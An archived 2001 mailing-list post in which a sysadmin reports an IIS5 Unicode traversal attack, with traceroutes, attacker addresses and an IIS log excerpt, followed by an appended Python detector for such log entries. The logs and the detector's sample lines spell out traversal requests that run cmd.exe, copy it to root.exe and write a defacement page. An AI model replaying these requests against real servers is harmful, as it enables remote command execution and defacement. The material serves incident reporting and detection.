We had an attacker exploiting Unicode on IIS5 yesterday - see the funny Chinese war pages in the log below. The hacker successfully exploited the IIS Unicode bug, created ~100 files but was still too dumb to deface the webserver. The attacker used 208.22.161.15 and 202.97.205.3. I tried a trace but ended up with ...

19 210 ms 211 ms 220 ms pao1-sjc2-oc48-2.pao1.above.net [
20 210 ms 231 ms 230 ms 208.184.129.244.cmnetcom.com.hk [
21 200 ms 211 ms 220 ms 202.0.170.34
22 361 ms 370 ms 411 ms 202.0.170.13
23 370 ms 391 ms 400 ms 202.97.10.193
24 521 ms 541 ms 551 ms 202.97.10.66
25 581 ms 601 ms 581 ms 61.138.38.2
26 721 ms 711 ms 671 ms 61.180.139.202
27 341 ms 350 ms 351 ms 202.97.205.3

208.22.161.15 seems to end at

17 130 ms 130 ms 131 ms ewr-core-02.inet.qwest.net [205.171.17.130]
18 110 ms 110 ms 111 ms ewr-brdr-01.inet.qwest.net [205.171.17.82]
19 * * * Timeout..

.... Any chances to find out to whom the two IP addresses belong? Any tool that copies cmd.exe to root.exe? I liked this hack, because nothing happened and people here suddenly develop security awareness. Hence, even the servers I begged to secure for weeks are patched now. BTW it's a German website - nothing to do with any Chinese-American spy wars. Funny hacker world...
thomas

--- IIS-Logsnip ---
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</html^>>.././index.asp 502 355 423 - - -
2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</html^>>.././index.htm 502 355 423 - - -

Thomas Springer
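The log snippet above is the kind of evidence a defender wants to pick out of an IIS W3C extended log automatically: `..` traversal in the URI stem, a path into `winnt\system32`, and an `.exe` under `/scripts/` being invoked with a `/c` query. The following Python detector is an added example and is not code from the post or its author. It assumes the W3C field order seen in the snippet (date, time, c-ip, cs-username, s-ip, s-port, cs-method, cs-uri-stem, cs-uri-query, sc-status); the sample log lines are constructed, modelled on the post's entries but using documentation and private address ranges. Because the "Unicode bug" hides the `..` behind overlong UTF-8 encodings, which valid UTF-8 (RFC 3629) never uses, the detector folds 2-byte overlong sequences back to ASCII before matching and also counts them as an indicator in their own right.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample IIS W3C log lines (not the post's original entries).
# Raw string so the backslashes in the Windows paths are kept literally.
SAMPLE_LOG = r"""
2001-05-07 12:28:54 192.0.2.10 - 10.0.0.5 80 GET /index.htm - 200 1200 66 - - -
2001-05-07 12:28:54 192.0.2.10 - 10.0.0.5 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
2001-05-07 12:28:55 192.0.2.10 - 10.0.0.5 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
2001-05-07 12:28:55 192.0.2.10 - 10.0.0.5 80 GET /scripts/root.exe /c+dir 502 355 423 - - -
2001-05-07 12:29:01 198.51.100.7 - 10.0.0.5 80 GET /images/logo.gif - 200 4096 60 - - -
"""

# Assumed field order for the leading columns (the snippet has no #Fields header).
FIELDS = ("date", "time", "c-ip", "cs-username", "s-ip", "s-port",
          "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status")

# ".." bounded by "/" or "\" (or line edge) in the decoded stem.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# A decoded stem that reaches into the system directory.
SYSTEM_BINARY = re.compile(r"[\\/]winnt[\\/]system32[\\/]", re.I)
# An executable sitting directly under /scripts/ (e.g. a copied shell).
EXEC_IN_SCRIPTS = re.compile(r"^/scripts/[^/]+\.exe$", re.I)


def decode_overlong_utf8(data: bytes):
    """Turn percent-decoded bytes into text, folding 2-byte overlong UTF-8
    sequences (lead byte 0xC0/0xC1) down to the ASCII character they encode.
    Returns (text, number_of_overlong_sequences_seen)."""
    out = bytearray()
    overlong = 0
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            overlong += 1
            i += 2
        else:
            out.append(b)
            i += 1
    # latin-1 maps every byte to a code point, so decoding cannot fail.
    return out.decode("latin-1"), overlong


def parse_line(line: str):
    """Split one W3C log line into the assumed leading fields; None if too short."""
    parts = line.split()
    if len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def inspect(entry: dict):
    """Return the list of indicator names that fire for one parsed entry."""
    stem, n_overlong = decode_overlong_utf8(unquote_to_bytes(entry["cs-uri-stem"]))
    # IIS logs spaces in the query as "+"; restore them before percent-decoding.
    query = unquote_to_bytes(entry["cs-uri-query"].replace("+", " ")).decode("latin-1")
    reasons = []
    if n_overlong:
        reasons.append("overlong-utf8")
    if TRAVERSAL.search(stem):
        reasons.append("traversal")
    if SYSTEM_BINARY.search(stem):
        reasons.append("system32-path")
    if EXEC_IN_SCRIPTS.match(stem) and query.startswith("/c "):
        reasons.append("exe-in-scripts-with-/c")
    return reasons


def scan(log_text: str):
    """Scan a whole log; return (client ip, raw stem, status, reasons) per hit."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = inspect(entry)
        if reasons:
            alerts.append((entry["c-ip"], entry["cs-uri-stem"], entry["sc-status"], reasons))
    return alerts


def suspicious_sources(alerts):
    """Distinct client addresses behind the alerts, sorted, for a block list or whois lookup."""
    return sorted({ip for ip, _, _, _ in alerts})


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for ip, stem, status, reasons in hits:
        print(f"{ip} {status} {stem} -> {', '.join(reasons)}")
    print("sources:", suspicious_sources(hits))
```

Matching runs on the decoded stem rather than the raw one, so the same rule catches both the plain `../../` form that appears in the post's log and an overlong-encoded variant; the `sc-status` column is carried along because, as in the post, a 502 does not mean the command failed to run, only that the gateway could not interpret the output.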
This archive was generated by hypermail 2b30 : Thu May 10 2001 - 18:54:07 PDT